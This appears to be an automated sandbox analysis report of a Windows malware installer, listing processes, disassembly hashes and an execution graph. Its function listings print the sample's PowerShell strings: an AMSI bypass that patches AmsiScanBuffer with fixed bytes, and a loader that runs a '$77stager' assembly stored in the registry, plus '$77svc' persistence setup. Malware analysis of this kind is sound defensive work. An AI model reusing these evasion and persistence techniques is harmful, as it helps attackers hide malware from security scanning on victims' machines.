                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:41
                                                                                                                                Start time:12:53:25
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\spoolsv.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\spoolsv.exe
                                                                                                                                Imagebase:0x7ff6367f0000
                                                                                                                                File size:842'752 bytes
                                                                                                                                MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:42
                                                                                                                                Start time:12:53:26
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:43
                                                                                                                                Start time:12:53:26
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFB4ADE0D80 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                  • Opcode ID: bcb8c97ab0ceb30ea07641faebb11d5cad3ac70917fa5e698a5af0c8e1fa968e
                                                                                                                                  • Instruction ID: 9ba7724c02a6aa713d59ab74902a80aecdb3a198e593972984d4e206ef3ecc8e
                                                                                                                                  • Opcode Fuzzy Hash: bcb8c97ab0ceb30ea07641faebb11d5cad3ac70917fa5e698a5af0c8e1fa968e
                                                                                                                                  • Instruction Fuzzy Hash: C63178A288E7C25FD3436B749C664A17FB0DE4722070A40EBD8C4CF8A3D51C699AC762
                                                                                                                                  Function 00007FFB4ADE10ED Relevance: .4, Instructions: 430COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8d49ca86f22e0a622569605d5112386f9c8c757510cfa6a65cb930bbe2ff2fc7
                                                                                                                                  • Instruction ID: 5cc12934cc298bf7e8a28954e5d726e86ce9af87b72fadb5d6a87c86e7b1c769
                                                                                                                                  • Opcode Fuzzy Hash: 8d49ca86f22e0a622569605d5112386f9c8c757510cfa6a65cb930bbe2ff2fc7
                                                                                                                                  • Instruction Fuzzy Hash: 4131C662B0DA895FE786BF789C592B97BE1EFAA341B1800FBE449C3193DD189C058351
                                                                                                                                  Function 00007FFB4ADE09F7 Relevance: .2, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 33e5eb3414f0c36253fd3a25409a17592264b8c136497743c9b2232464d764dc
                                                                                                                                  • Instruction ID: 3ddf0869939e02f79fc837911bc0adf1e41c45071214b30efd4061d14cac884c
                                                                                                                                  • Opcode Fuzzy Hash: 33e5eb3414f0c36253fd3a25409a17592264b8c136497743c9b2232464d764dc
                                                                                                                                  • Instruction Fuzzy Hash: 3B714C70A199099FEB99EF78D458BAD77E2FF58314F2005A8E45AC36D6CE389C41CB40
                                                                                                                                  Function 00007FFB4ADE0498 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec2222f9e5ff8b7ea311606d7cd4a114255240c38f5d8d2c822d5f554627bd4a
                                                                                                                                  • Instruction ID: 2eedad755066f36e375367228ad97e9a3d4140426e9d9cc4ed5b4c2881a47712
                                                                                                                                  • Opcode Fuzzy Hash: ec2222f9e5ff8b7ea311606d7cd4a114255240c38f5d8d2c822d5f554627bd4a
                                                                                                                                  • Instruction Fuzzy Hash: 38217161B19D495FEB84FE6CC8596BD77D1EB98345B0400BAE40DC3292DD24A8018740
                                                                                                                                  Function 00007FFB4ADE0951 Relevance: .1, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1587c414008d343b384e04202fa5df17bed6074d65ce062c0b3cb45ab15efba5
                                                                                                                                  • Instruction ID: 6d20549fbc0fc394496178fb1e9fa3eeee555cd45522c2dadfce9932de27e984
                                                                                                                                  • Opcode Fuzzy Hash: 1587c414008d343b384e04202fa5df17bed6074d65ce062c0b3cb45ab15efba5
                                                                                                                                  • Instruction Fuzzy Hash: AF11A0B1D08A485FEB44DFB8C8452EE7BF1EF58310F144169D444E7282DB389946CB51
                                                                                                                                  Function 00007FFB4ADE0E71 Relevance: .1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 91a8cacac5a566f3bd040f51f0cd7ae22a878642e1c8eef4c951a0faf4f78d95
                                                                                                                                  • Instruction ID: 93963574af7cb8fae810c2b9ca2fce9d0f954d01dded1d95cb56796aaf4d2ddd
                                                                                                                                  • Opcode Fuzzy Hash: 91a8cacac5a566f3bd040f51f0cd7ae22a878642e1c8eef4c951a0faf4f78d95
                                                                                                                                  • Instruction Fuzzy Hash: B1012671B5DE8A0FD394EB38E8921BA73D1EF88204B5009B5C949C3782DA28E84287C5
                                                                                                                                  Function 00007FFB4ADE04A8 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d2cf156f5596f92da3f7110a15a7e7ff9bc9ff1754aa1d1db9b77a8fc11547ba
                                                                                                                                  • Instruction ID: fb1b3f5fa3ee2cb9546c7c3a4760cbf9e335f5674ecb6900186aca0295c91afe
                                                                                                                                  • Opcode Fuzzy Hash: d2cf156f5596f92da3f7110a15a7e7ff9bc9ff1754aa1d1db9b77a8fc11547ba
                                                                                                                                  • Instruction Fuzzy Hash: E5F02870B6E95B5BE794FA3CE4425BA73D5EF88314B6009B5D90EC3782CD28A84287C4
                                                                                                                                  Function 00007FFB4ADE04B0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cc54250326a35fa8d4c55b1bb77df03f58f78b464f5ba19af5f931c9f38b4f48
                                                                                                                                  • Instruction ID: cd70f6a3b28678456023a681e321540b82c44facd4e824c768ea5c0bc79fd780
                                                                                                                                  • Opcode Fuzzy Hash: cc54250326a35fa8d4c55b1bb77df03f58f78b464f5ba19af5f931c9f38b4f48
                                                                                                                                  • Instruction Fuzzy Hash: 99F0D17076D95A5BD794BA38E44167E73D1EB88700B600979D80EC3781DE28A84287C5
                                                                                                                                  Function 00007FFB4ADE0F3F Relevance: .0, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1407488881.00007FFB4ADE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffb4ade0000_RdLfpZY5A9.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4cd8a0777ae23c19b58346ed0661b373dc3da76c2da9f44fa73dd35f48bb8b6e
                                                                                                                                  • Instruction ID: 7ad9e1cb206c626a3a3902787c6b9afd2b7c4b1034775774fb58b380ab68816d
                                                                                                                                  • Opcode Fuzzy Hash: 4cd8a0777ae23c19b58346ed0661b373dc3da76c2da9f44fa73dd35f48bb8b6e
                                                                                                                                  • Instruction Fuzzy Hash: 22E08651F5DD0A0BF79C7ABC68662B9A7C5DB88210F914575E41EC26C3EC0DDC829245

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:72.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:58.4%
                                                                                                                                  Total number of Nodes:101
                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                  execution_graph 238 7c1798 241 7c17a5 FindResourceA 238->241 242 7c17c5 SizeofResource 241->242 243 7c179d ExitProcess 241->243 242->243 244 7c17d8 242->244 244->243 245 7c17e4 LockResource RegOpenKeyExW 244->245 245->243 246 7c180b RegSetValueExW 245->246 246->243 247 7c1822 246->247 259 7c1868 GetProcessHeap HeapAlloc StrCpyW 247->259 251 7c1835 252 7c1674 9 API calls 251->252 253 7c1841 252->253 306 7c112f GetCurrentProcess IsWow64Process 253->306 257 7c1854 257->243 319 7c151a SysAllocString SysAllocString CoInitializeEx 257->319 329 7c1159 259->329 261 7c1893 262 7c189d StrCatW 261->262 263 7c18c5 StrCatW StrCatW 261->263 264 7c112f 2 API calls 262->264 332 7c19e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 263->332 266 7c18aa StrCatW StrCatW 264->266 266->263 271 7c1986 6 API calls 272 7c18f0 271->272 273 7c1986 6 API calls 272->273 274 7c18fc 273->274 275 7c1986 6 API calls 274->275 276 7c1908 275->276 277 7c1986 6 API calls 276->277 278 7c1914 277->278 279 7c1986 6 API calls 278->279 280 7c1920 279->280 281 7c1986 6 API calls 280->281 282 7c192c 281->282 283 7c1986 6 API calls 282->283 284 7c1938 283->284 285 7c1986 6 API calls 284->285 286 7c1944 285->286 287 7c1986 6 API calls 286->287 288 7c1950 287->288 289 7c1986 6 API calls 288->289 290 7c195c 289->290 291 7c1986 6 API calls 290->291 292 7c1968 291->292 293 7c1986 6 API calls 292->293 294 7c1974 293->294 295 7c1986 6 API calls 294->295 296 7c1827 295->296 297 7c1674 SysAllocString SysAllocString CoInitializeEx 296->297 298 7c16a7 CoInitializeSecurity 297->298 299 7c1782 297->299 300 7c16bd 298->300 301 7c16c8 CoCreateInstance 298->301 302 7c1785 SysFreeString SysFreeString 299->302 300->301 305 7c172d CoUninitialize 300->305 303 7c16ea VariantInit 301->303 301->305 302->251 303->305 305->302 307 7c114e 306->307 308 7c11ad 7 API calls 307->308 309 7c1209 CoInitializeSecurity 308->309 310 7c14f0 308->310 311 7c121f 309->311 312 7c122a CoCreateInstance 309->312 313 7c14f3 6 API calls 310->313 311->312 316 7c1444 CoUninitialize 311->316 314 7c124c VariantInit 312->314 312->316 313->257 317 7c128f 314->317 316->313 317->316 318 7c13dd VariantInit VariantInit VariantInit 317->318 318->316 320 7c154d CoInitializeSecurity 319->320 321 7c165f SysFreeString SysFreeString 319->321 322 7c156e CoCreateInstance 320->322 323 7c1563 320->323 321->243 324 7c1659 CoUninitialize 322->324 325 7c1590 VariantInit 322->325 323->322 323->324 324->321 326 7c15d3 325->326 327 7c1605 VariantInit 326->327 328 7c162b 326->328 327->328 328->324 352 7c118e GetModuleHandleA 329->352 331 7c1178 331->261 355 7c1000 CryptAcquireContextW 332->355 335 7c18d8 345 7c1986 lstrlenW 335->345 336 7c1a37 StrStrIW 344 7c1a9d 336->344 337 7c1a57 StrStrIW StrNCatW StrCatW 339 7c1b41 StrCatW StrStrIW 337->339 337->344 338 7c1b71 6 API calls 338->335 339->344 340 7c1b27 StrCatW 340->339 340->344 341 7c1afb StrCatW StrNCatW 342 7c1b18 StrCatW 341->342 342->340 343 7c1adf StrCatW StrCatW 343->342 344->337 344->338 344->340 344->341 344->343 358 7c104b 345->358 348 7c18e4 348->271 349 7c19b3 StrStrIW 349->348 350 7c19bf 349->350 351 7c19c0 StrStrIW 350->351 351->348 351->351 353 7c119d GetProcAddress 352->353 354 7c11aa 352->354 353->331 354->331 356 7c1028 CryptGenRandom CryptReleaseContext 355->356 357 7c1044 355->357 356->357 357->335 357->336 359 7c1000 3 API calls 358->359 360 7c1076 359->360 360->348 360->349

                                                                                                                                  Callgraph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  • Opacity -> Relevance
                                                                                                                                  • Disassembly available
                                                                                                                                  callgraph 0 Function_007C1798 10 Function_007C17A5 0->10 1 Function_007C1159 6 Function_007C118E 1->6 2 Function_007C151A 3 Function_007C1674 4 Function_007C10B1 5 Function_007C11AD 7 Function_007C112F 8 Function_007C1868 8->1 8->7 11 Function_007C1986 8->11 13 Function_007C19E1 8->13 9 Function_007C104B 12 Function_007C1000 9->12 10->2 10->3 10->5 10->7 10->8 11->9 13->4 13->12

                                                                                                                                  Executed Functions

                                                                                                                                  Function 007C1868 Relevance: 49.1, APIs: 8, Strings: 20, Instructions: 86memoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,007C1827,?,?,?,?,?,007C179D), ref: 007C1872
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C1879
                                                                                                                                  • StrCpyW.SHLWAPI(00000000,007C222C), ref: 007C1888
                                                                                                                                  • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 007C18A3
                                                                                                                                    • Part of subcall function 007C112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C113D
                                                                                                                                    • Part of subcall function 007C112F: IsWow64Process.KERNEL32(00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C1144
                                                                                                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 007C18BB
                                                                                                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 007C18C3
                                                                                                                                  • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo), ref: 007C18CB
                                                                                                                                  • StrCatW.SHLWAPI(00000000,007C222C), ref: 007C18CF
                                                                                                                                  Strings
                                                                                                                                  • NativeMethods, xrefs: 007C1908
                                                                                                                                  • ReturnType, xrefs: 007C18F0
                                                                                                                                  • LoadLibraryDelegate, xrefs: 007C1920
                                                                                                                                  • GetProcAddress, xrefs: 007C1914
                                                                                                                                  • LoadLibraryPtr, xrefs: 007C1944
                                                                                                                                  • OldProtect, xrefs: 007C1974
                                                                                                                                  • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 007C189D
                                                                                                                                  • AmsiPtr, xrefs: 007C195C
                                                                                                                                  • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo, xrefs: 007C18C5
                                                                                                                                  • Kernel32Ptr, xrefs: 007C1938
                                                                                                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 007C18AE
                                                                                                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 007C18B5
                                                                                                                                  • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 007C18BD
                                                                                                                                  • ,"|, xrefs: 007C187F
                                                                                                                                  • VirtualProtectPtr, xrefs: 007C1950
                                                                                                                                  • Get-Delegate, xrefs: 007C18D8
                                                                                                                                  • ParameterTypes, xrefs: 007C18E4
                                                                                                                                  • AmsiScanBufferPtr, xrefs: 007C1968
                                                                                                                                  • VirtualProtectDelegate, xrefs: 007C192C
                                                                                                                                  • TypeBuilder, xrefs: 007C18FC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Heap$AllocCurrentWow64
                                                                                                                                  • String ID: ,"|$AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                                                                                  • API String ID: 2666690646-1378993767
                                                                                                                                  • Opcode ID: f400b2c14ee1839192f74ce9737d1b7028b1cf47be0c4106c7c585d957a6d645
                                                                                                                                  • Instruction ID: 2295026c5b93c93544d88b8ad41139771282751919152315a442010b25c3c73b
                                                                                                                                  • Opcode Fuzzy Hash: f400b2c14ee1839192f74ce9737d1b7028b1cf47be0c4106c7c585d957a6d645
                                                                                                                                  • Instruction Fuzzy Hash: D421D0D03429A4A3590632201D6AF6E97469BC2B51790C03DF4455EB8BDE3D9F0343DA
                                                                                                                                  Function 007C151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151memorycomCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 133 7c151a-7c1547 SysAllocString * 2 CoInitializeEx 134 7c154d-7c1561 CoInitializeSecurity 133->134 135 7c165f-7c1673 SysFreeString * 2 133->135 136 7c156e-7c158a CoCreateInstance 134->136 137 7c1563-7c1568 134->137 138 7c1659 CoUninitialize 136->138 139 7c1590-7c15d5 VariantInit 136->139 137->136 137->138 138->135 141 7c164d-7c1656 139->141 142 7c15d7-7c15ec 139->142 141->138 142->141 145 7c15ee-7c1603 142->145 147 7c1644-7c1648 145->147 148 7c1605-7c162d VariantInit 145->148 147->141 150 7c162f-7c1636 148->150 151 7c163b-7c163f 148->151 150->151 151->147
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32($77svc64), ref: 007C152C
                                                                                                                                  • SysAllocString.OLEAUT32(007C218C), ref: 007C1538
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 007C153F
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1559
                                                                                                                                  • CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C1582
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1594
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1609
                                                                                                                                  • CoUninitialize.COMBASE ref: 007C1659
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 007C1666
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C166B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                                                                                  • String ID: $77svc32$$77svc64
                                                                                                                                  • API String ID: 2407135876-98264542
                                                                                                                                  • Opcode ID: 7b159f20ca1045c38b1289aaff2526a31ba2aa0064e764430bd9b9ca99151024
                                                                                                                                  • Instruction ID: 88dca11e24104d192f1ae8e9018d749c0b4a373a1cbdc47e8dabc0241a6220fc
                                                                                                                                  • Opcode Fuzzy Hash: 7b159f20ca1045c38b1289aaff2526a31ba2aa0064e764430bd9b9ca99151024
                                                                                                                                  • Instruction Fuzzy Hash: 8D412D71A00509AFDB01EFA4CC84EAFBBBDEF49314B54406DF905EB251CA75AD46CBA0
                                                                                                                                  Function 007C17A5 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 73registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 152 7c17a5-7c17bf FindResourceA 153 7c17c5-7c17d2 SizeofResource 152->153 154 7c1862-7c1867 152->154 155 7c17d8-7c17e2 153->155 156 7c1861 153->156 155->156 158 7c17e4-7c1809 LockResource RegOpenKeyExW 155->158 156->154 158->156 159 7c180b-7c1820 RegSetValueExW 158->159 159->156 160 7c1822-7c1858 call 7c1868 call 7c1674 * 2 call 7c112f call 7c11ad 159->160 160->156 171 7c185a-7c185c call 7c151a 160->171 171->156
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 007C17B5
                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17C8
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17DA
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C17E5
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,007C179D), ref: 007C1801
                                                                                                                                  • RegSetValueExW.KERNELBASE(?,$77stager,00000000,00000003,00000000,00000000,?,?,?,?,?,007C179D), ref: 007C1818
                                                                                                                                    • Part of subcall function 007C1868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,007C1827,?,?,?,?,?,007C179D), ref: 007C1872
                                                                                                                                    • Part of subcall function 007C1868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C1879
                                                                                                                                    • Part of subcall function 007C1868: StrCpyW.SHLWAPI(00000000,007C222C), ref: 007C1888
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 007C18A3
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 007C18BB
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 007C18C3
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo), ref: 007C18CB
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,007C222C), ref: 007C18CF
                                                                                                                                    • Part of subcall function 007C1674: SysAllocString.OLEAUT32($77svc32), ref: 007C1686
                                                                                                                                    • Part of subcall function 007C1674: SysAllocString.OLEAUT32(007C218C), ref: 007C1690
                                                                                                                                    • Part of subcall function 007C1674: CoInitializeEx.COMBASE(00000000,00000000), ref: 007C1699
                                                                                                                                    • Part of subcall function 007C1674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C16B3
                                                                                                                                    • Part of subcall function 007C1674: CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C16DC
                                                                                                                                    • Part of subcall function 007C1674: VariantInit.OLEAUT32(?), ref: 007C16EE
                                                                                                                                    • Part of subcall function 007C1674: CoUninitialize.COMBASE ref: 007C177A
